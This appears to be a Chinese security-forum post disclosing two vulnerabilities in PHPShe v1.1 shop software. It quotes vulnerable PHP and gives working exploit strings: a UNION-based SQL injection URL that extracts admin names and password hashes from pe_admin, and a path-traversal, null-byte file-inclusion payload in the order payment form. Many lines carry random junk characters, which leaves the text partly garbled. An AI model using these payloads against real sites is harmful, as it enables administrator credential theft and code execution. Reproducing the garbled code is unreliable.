0×02 搜索注入2 S/ z( b+ a! U# q& F* M
<code id="code2">
//product.php文件6 X6 g( S& R3 b
case 'list':" Q! }0 f2 t$ K6 j& n
$category_id = intval($id);
$info = $db->pe_select('category', array('category_id'=>$category_id));' M2 k4 G/ R$ t( E7 P
//搜索
$sqlwhere = " and `product_state` = 1";
pe_lead('hook/category.hook.php');
if ($category_id) {+ B' M& Y. d# y" C, P8 K$ F" z
where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";6 G" S3 y4 G. y5 P5 L1 a, C
}6 j; S7 O9 Z" A& M: R4 ]
$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤2 f( x* P* Q& h6 @/ P: t
if ($_g_orderby) {
$orderby = explode('_', $_g_orderby);; p s& N @! o: J7 E
$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
}
else {8 [5 F0 e# D K; G2 V
$sqlwhere .= " order by `product_id` desc";' b) _8 M% e \) [/ b
}& D8 }* R; T [5 M5 o2 y
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
//热卖排行
$product_hotlist = product_hotlist();% X# M6 H& \( }/ Z1 g! l
//当前路径: w! t `+ [: h- e% N
$nowpath = category_path($category_id);
$seo = pe_seo($info['category_name']);
include(pe_tpl('product_list.html'));: q1 `/ s2 T+ S+ p! V- B- l
//跟进selectall函数库
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
{
//处理条件语句1 p/ c8 v/ M0 z2 m6 }9 ~
$sqlwhere = $this->_dowhere($where);
return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);! L) M3 p! q. G7 `* A
}4 [+ @5 m$ `9 `) b/ ?
//exp! g; M3 t% {# r5 y7 \7 P
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1
</code>3 ^$ v6 e6 n: S6 h
0×03 包含漏洞2! O/ m: q, h7 L5 ]
8 d1 z. r: Z; p1 O! C
<code id="code3">
//order.php
case 'pay':
$order_id = pe_dbhold($_g_id);
% ^' a$ V( ^0 T! Q1 O# s
$cache_payway = cache::get('payway');
foreach($cache_payway as $k => $v) {
$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);
if ($k == 'bank') {
6 ]' ]% n) e' G4 t U) i% E3 L
$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);
}
}
. i- U' @4 u8 \/ K* Q
$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));
!$order['order_id'] && pe_error('订单号错误...');
! S3 T6 B; x2 O/ x, p+ ?
if (isset($_p_pesubmit)) {
if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {
* J7 c: V- k( \
$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));
foreach ($info_list as $v) {
" J% i& t- \- A4 g9 _% H! ~" U
$order['order_name'] .= "{$v['product_name']};";* N. Y& ]$ s+ |% P
}
! _2 b8 c9 ~$ j. x- _
echo '正在为您连接支付网站,请稍后...';
include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");
}//当一切准备好的时候就可以进行"鸡肋包含了"
- v- P' C2 [8 B$ N
else {
! _( C6 P2 X! V% F' e R5 A: d
pe_error('支付错误...');
}
' r* p! x* A+ \ T; w
}
$seo = pe_seo('选择支付方式');
include(pe_tpl('order_pay.html'));
( l3 o* ~( s" m1 O+ Z
break;
}
//exp:
//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001
//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
http://www.myhack58.com/Article/UploadPic/2013-4/20134161293183866.jpg
| 欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) | Powered by Discuz! X3.2 |